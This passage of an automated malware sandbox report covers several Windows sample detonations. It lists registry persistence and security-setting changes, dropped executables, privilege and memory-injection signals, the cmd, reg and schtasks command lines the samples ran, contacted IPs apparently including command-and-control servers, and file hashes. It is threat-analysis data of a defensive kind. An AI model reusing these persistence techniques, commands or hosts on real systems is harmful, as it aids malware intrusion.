| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winrecsv.exe" | C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe | N/A |
| File opened for modification | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1534510428.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1534510428.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe
"C:\Users\Admin\AppData\Local\Temp\22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092.exe"
C:\Windows\winrecsv.exe
C:\Windows\winrecsv.exe
C:\Users\Admin\AppData\Local\Temp\1534510428.exe
C:\Users\Admin\AppData\Local\Temp\1534510428.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\489331092.exe
C:\Users\Admin\AppData\Local\Temp\489331092.exe
Network
| Country | Destination | Domain | Proto |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| UZ | 185.248.47.58:40500 | udp | |
| UZ | 87.237.234.21:40500 | tcp | |
| EG | 197.55.8.190:40500 | udp | |
| US | 20.189.173.4:443 | tcp | |
| KG | 31.186.54.109:40500 | udp | |
| IR | 91.98.117.42:40500 | udp | |
| IR | 78.38.199.41:40500 | udp | |
| NL | 87.248.202.1:80 | tcp | |
| NL | 87.248.202.1:80 | tcp | |
| NL | 87.248.202.1:80 | tcp | |
| IR | 2.182.180.212:40500 | udp | |
| IR | 5.236.118.148:40500 | tcp | |
| RU | 178.35.166.9:40500 | udp | |
| IR | 94.183.130.203:40500 | udp | |
| N/A | 10.231.1.75:40500 | udp | |
| AO | 154.65.146.137:40500 | udp | |
| TR | 109.228.205.235:40500 | udp | |
| IR | 5.238.180.241:40500 | tcp | |
| IR | 80.210.173.89:40500 | udp | |
| IR | 134.255.202.200:40500 | udp | |
| IR | 217.66.207.226:40500 | udp | |
| YE | 134.35.117.27:40500 | udp | |
| US | 69.67.151.86:40500 | udp | |
| AZ | 94.20.233.190:40500 | tcp | |
| AZ | 94.20.233.124:40500 | udp | |
| IR | 31.57.179.129:40500 | udp | |
| AF | 103.83.18.154:40500 | udp | |
| UA | 78.137.21.80:40500 | udp | |
| RS | 89.216.189.254:40500 | udp | |
| IR | 2.187.40.233:40500 | tcp | |
| UZ | 217.30.162.41:40500 | udp | |
| UZ | 213.230.111.34:40500 | udp | |
| N/A | 10.231.11.131:40500 | udp | |
| N/A | 46.42.62.168:40500 | udp |
Files
memory/4364-132-0x0000000000000000-mapping.dmp
C:\Windows\winrecsv.exe
| MD5 | ed2d7b25bb360cccb4f0f6a4f8732d7a |
| SHA1 | 6ffcc083956c5ac19826bdd87e12f87817ee837c |
| SHA256 | 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092 |
| SHA512 | 6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f |
C:\Windows\winrecsv.exe
| MD5 | ed2d7b25bb360cccb4f0f6a4f8732d7a |
| SHA1 | 6ffcc083956c5ac19826bdd87e12f87817ee837c |
| SHA256 | 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092 |
| SHA512 | 6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f |
memory/4344-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1534510428.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\1534510428.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/4344-138-0x0000000000100000-0x0000000000106000-memory.dmp
memory/4044-139-0x0000000000000000-mapping.dmp
memory/3700-140-0x0000000000000000-mapping.dmp
memory/204-141-0x0000000000000000-mapping.dmp
memory/1288-142-0x0000000000000000-mapping.dmp
memory/4344-143-0x00007FFC178F0000-0x00007FFC183B1000-memory.dmp
memory/4344-144-0x00007FFC178F0000-0x00007FFC183B1000-memory.dmp
memory/1704-145-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\489331092.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\489331092.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
Analysis: behavioral13
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220812-en
Max time kernel
137s
Max time network
140s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7a.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "371128492" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{594ADA81-3F1E-11ED-B390-DA7E66F9F45D} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{594AB371-3F1E-11ED-B390-DA7E66F9F45D} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7a.exe
"C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7a.exe"
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:980 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:904 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.bing.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
Files
memory/896-54-0x0000000075B41000-0x0000000075B43000-memory.dmp
\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/872-57-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{594ADA81-3F1E-11ED-B390-DA7E66F9F45D}.dat
| MD5 | eff6be6bd7ec2f9dc538a355cffd89e4 |
| SHA1 | 832a5132e5944894d51b9d4192ffb2cda2476c45 |
| SHA256 | 2cc00e73ad08ed84afb87c4698e7c2cb903185502ba64ccb2d632bb60cc6abc4 |
| SHA512 | c85887f6a7e94f3aa37f6a07d91b38dc2515eaa9ffa55256a47fd46cbbaff8071926602fc25bc55e17565c57a5bc4fe7f41e6acfce7a71d86acbd153df0a2b85 |
memory/896-62-0x0000000000170000-0x00000000001CD000-memory.dmp
memory/872-63-0x0000000000400000-0x000000000045D000-memory.dmp
memory/896-61-0x0000000000920000-0x0000000000941000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{594AB371-3F1E-11ED-B390-DA7E66F9F45D}.dat
| MD5 | be22137c0c5e632ca1a693823931fb7d |
| SHA1 | 40b665476fdd66c579ba5f69d6e4d970b777bd66 |
| SHA256 | c542de8445734698dc643a44e055ca0828a8f7c4592745d658c210c06e078321 |
| SHA512 | 680239715703953ad867c27b9003a0041f47938707715099af01b69160b7d0b60f71530e0158b06de93ae82cc08c875e709a2f41d69402c296c6bb9ad7325a44 |
memory/872-64-0x0000000000400000-0x000000000045D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\3XG2GOE7.txt
| MD5 | 72c7074572adc0c7ff1ffd9674745819 |
| SHA1 | d56c295799a1e4ed821b23af2058c68efe938918 |
| SHA256 | 1bb6f1c405c7e78aeddd4a7ad916ade234f92498246a12e5688865b3afdecc7e |
| SHA512 | f593483d8c2ae27211ee07884fa325cc76eb02a26e70981cf6cd2773fd5834debcb9c1e22b9869b11952ffc8935c58e47b1f924489418121b1bee12bdb767472 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
91s
Max time network
154s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe
"C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe"
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 4292 -ip 4292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 272
Network
| Country | Destination | Domain | Proto |
| AU | 104.46.162.226:443 | tcp | |
| US | 67.24.171.254:80 | tcp | |
| US | 67.24.171.254:80 | tcp | |
| US | 67.24.171.254:80 | tcp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
Files
memory/4292-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/1800-135-0x0000000000210000-0x0000000000231000-memory.dmp
memory/4292-136-0x0000000000400000-0x000000000045D000-memory.dmp